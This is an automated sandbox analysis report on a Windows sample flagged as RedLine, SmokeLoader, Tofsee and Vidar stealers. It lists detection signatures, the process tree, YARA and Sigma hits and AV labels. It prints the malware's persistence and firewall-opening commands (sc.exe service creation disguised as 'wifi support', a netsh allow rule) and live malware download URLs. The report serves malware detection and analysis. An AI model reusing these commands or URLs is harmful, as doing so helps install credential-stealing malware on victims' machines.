Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report OG9rNsihJ7.exe

Overview

General Information

Sample Name:OG9rNsihJ7.exe
Analysis ID:553412
MD5:5c7b46771055043f59e0451a342b7ed1
SHA1:5362af084622dc8efc661c703d4c7c5dd6839be1
SHA256:0245c82558329cfd8ef5ef901e4929075d4d873ba20d9704731758580caed7be
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Social media urls found in memory data
Found evaded block containing many API calls
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • OG9rNsihJ7.exe (PID: 4948 cmdline: "C:\Users\user\Desktop\OG9rNsihJ7.exe" MD5: 5C7B46771055043F59E0451A342B7ED1)
    • OG9rNsihJ7.exe (PID: 5424 cmdline: "C:\Users\user\Desktop\OG9rNsihJ7.exe" MD5: 5C7B46771055043F59E0451A342B7ED1)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • B1B2.exe (PID: 6924 cmdline: C:\Users\user\AppData\Local\Temp\B1B2.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 7156 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • BFBD.exe (PID: 6984 cmdline: C:\Users\user\AppData\Local\Temp\BFBD.exe MD5: 5C7B46771055043F59E0451A342B7ED1)
          • BFBD.exe (PID: 7140 cmdline: C:\Users\user\AppData\Local\Temp\BFBD.exe MD5: 5C7B46771055043F59E0451A342B7ED1)
          • svchost.exe (PID: 7140 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
        • 254E.exe (PID: 1268 cmdline: C:\Users\user\AppData\Local\Temp\254E.exe MD5: 41AB3EFA04441E560A279BD0F7C0503D)
        • 3136.exe (PID: 5060 cmdline: C:\Users\user\AppData\Local\Temp\3136.exe MD5: 023802260A0216012A5F00079406D967)
          • cmd.exe (PID: 5992 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ffiawxs\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 1928 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe" C:\Windows\SysWOW64\ffiawxs\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 3532 cmdline: C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5500 cmdline: C:\Windows\System32\sc.exe" description ffiawxs "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 7068 cmdline: "C:\Windows\System32\sc.exe" start ffiawxs MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 3720 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 4560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 3BC6.exe (PID: 6244 cmdline: C:\Users\user\AppData\Local\Temp\3BC6.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 3BC6.exe (PID: 7064 cmdline: C:\Users\user\AppData\Local\Temp\3BC6.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
  • svchost.exe (PID: 3756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4840 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6092 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2600 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4568 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 2076 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1188 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6656 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • vfgiwcs (PID: 6824 cmdline: C:\Users\user\AppData\Roaming\vfgiwcs MD5: 5C7B46771055043F59E0451A342B7ED1)
    • vfgiwcs (PID: 6840 cmdline: C:\Users\user\AppData\Roaming\vfgiwcs MD5: 5C7B46771055043F59E0451A342B7ED1)
  • svchost.exe (PID: 6976 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 7020 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6924 -ip 6924 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 7148 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • xqfkdfcl.exe (PID: 5432 cmdline: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d"C:\Users\user\AppData\Local\Temp\3136.exe" MD5: 5C50CF4AF77D12BF94B3FC09437C8B16)
    • svchost.exe (PID: 3440 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\8017.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x3b87:$x1: https://cdn.discordapp.com/attachments/

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000002D.00000000.408848131.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    0000001D.00000002.380383276.0000000000400000.00000040.00020000.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
      00000018.00000002.366966979.00000000004B0000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        0000001C.00000002.357825450.000000000083A000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000001C.00000002.357825450.000000000083A000.00000004.00000001.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Click to see the 22 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            19.1.vfgiwcs.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              30.2.3BC6.exe.3aaf910.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                1.1.OG9rNsihJ7.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  42.2.xqfkdfcl.exe.840000.2.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                    19.2.vfgiwcs.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                      Click to see the 24 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspect Svchost ActivityShow sources
                      Source: Process startedAuthor: David Burkett: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d"C:\Users\user\AppData\Local\Temp\3136.exe", ParentImage: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe, ParentProcessId: 5432, ProcessCommandLine: svchost.exe, ProcessId: 3440
                      Sigma detected: Copying Sensitive Files with Credential DataShow sources
                      Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe" C:\Windows\SysWOW64\ffiawxs\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe" C:\Windows\SysWOW64\ffiawxs\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\3136.exe, ParentImage: C:\Users\user\AppData\Local\Temp\3136.exe, ParentProcessId: 5060, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe" C:\Windows\SysWOW64\ffiawxs\, ProcessId: 1928
                      Sigma detected: Suspicious Svchost ProcessShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d"C:\Users\user\AppData\Local\Temp\3136.exe", ParentImage: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe, ParentProcessId: 5432, ProcessCommandLine: svchost.exe, ProcessId: 3440
                      Sigma detected: Netsh Port or Application AllowedShow sources
                      Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\3136.exe, ParentImage: C:\Users\user\AppData\Local\Temp\3136.exe, ParentProcessId: 5060, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 3720
                      Sigma detected: New Service CreationShow sources
                      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\3136.exe, ParentImage: C:\Users\user\AppData\Local\Temp\3136.exe, ParentProcessId: 5060, ProcessCommandLine: C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 3532
                      Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\BFBD.exe, ParentImage: C:\Users\user\AppData\Local\Temp\BFBD.exe, ParentProcessId: 6984, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, ProcessId: 7140

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://81.163.30.181/l2.exeAvira URL Cloud: Label: malware
                      Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                      Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exeAvira URL Cloud: Label: malware
                      Source: http://unicupload.top/install5.exeURL Reputation: Label: phishing
                      Source: http://privacy-tools-for-you-780.com/downloads/toolspab3.exeAvira URL Cloud: Label: malware
                      Source: http://data-host-coin-8.com/files/7729_1642101604_1835.exeAvira URL Cloud: Label: malware
                      Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exeAvira URL Cloud: Label: malware
                      Source: http://81.163.30.181/l3.exeAvira URL Cloud: Label: malware
                      Antivirus detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeAvira: detection malicious, Label: HEUR/AGEN.1211353
                      Source: C:\Users\user\AppData\Local\Temp\xqfkdfcl.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                      Source: C:\Users\user\AppData\Local\Temp\2473.exeAvira: detection malicious, Label: HEUR/AGEN.1212012
                      Source: C:\Users\user\AppData\Local\Temp\6AF7.exeAvira: detection malicious, Label: HEUR/AGEN.1212012
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: OG9rNsihJ7.exeReversingLabs: Detection: 48%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeMetadefender: Detection: 45%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeReversingLabs: Detection: 89%
                      Source: C:\Users\user\AppData\Local\Temp\45AA.exeMetadefender: Detection: 34%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\45AA.exeReversingLabs: Detection: 76%
                      Source: C:\Users\user\AppData\Local\Temp\54AF.exeReversingLabs: Detection: 50%
                      Source: C:\Users\user\AppData\Local\Temp\8017.exeReversingLabs: Detection: 34%
                      Machine Learning detection for sampleShow sources
                      Source: OG9rNsihJ7.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\FC2A.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\9789.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\45AA.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\8017.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\2F32.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\54AF.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\xqfkdfcl.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\88E2.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\7808.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\3A7E.exeJoe Sandbox ML: detected
                      Source: 28.3.254E.exe.7f0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 42.2.xqfkdfcl.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 29.2.3136.exe.6c0e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 29.3.3136.exe.7f0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 42.3.xqfkdfcl.exe.7f0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 44.2.svchost.exe.7b0000.0.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 28.2.254E.exe.6c0e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 29.2.3136.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 42.2.xqfkdfcl.exe.840000.2.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 42.2.xqfkdfcl.exe.680e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00407190 CryptUnprotectData,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C76C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C4A80 CryptStringToBinaryA,CryptStringToBinaryA,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C7760 CryptUnprotectData,LocalAlloc,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C73E0 CryptUnprotectData,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C79F0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeUnpacked PE file: 28.2.254E.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeUnpacked PE file: 29.2.3136.exe.400000.0.unpack
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exeUnpacked PE file: 42.2.xqfkdfcl.exe.400000.0.unpack
                      Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49949 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49950 version: TLS 1.0
                      Source: OG9rNsihJ7.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.5:49785 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49806 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.5:49874 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49876 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49894 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49918 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49921 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49928 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49937 version: TLS 1.2
                      Source: Binary string: msvcrt.pdbk source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb( source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355319445.0000000003678000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355100434.0000000003678000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355041486.000000000541B000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355698589.0000000003678000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: C:\xore salafoyukumabu3\ra.pdb source: 254E.exe, 0000001C.00000000.351672177.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355300183.0000000003672000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.356247461.0000000003672000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: AC:\xore salafoyukumabu3\ra.pdbh source: 254E.exe, 0000001C.00000000.351672177.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: [+C:\mubinidefup56_bum.pdbh source: OG9rNsihJ7.exe, 00000000.00000002.238062965.0000000000401000.00000020.00020000.sdmp, OG9rNsihJ7.exe, 00000000.00000000.231517264.0000000000401000.00000020.00020000.sdmp, OG9rNsihJ7.exe, 00000001.00000000.236309691.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000012.00000000.326118526.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000012.00000002.333467369.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000013.00000000.329837112.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000016.00000002.355073966.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000016.00000000.344254452.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000018.00000000.351452912.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
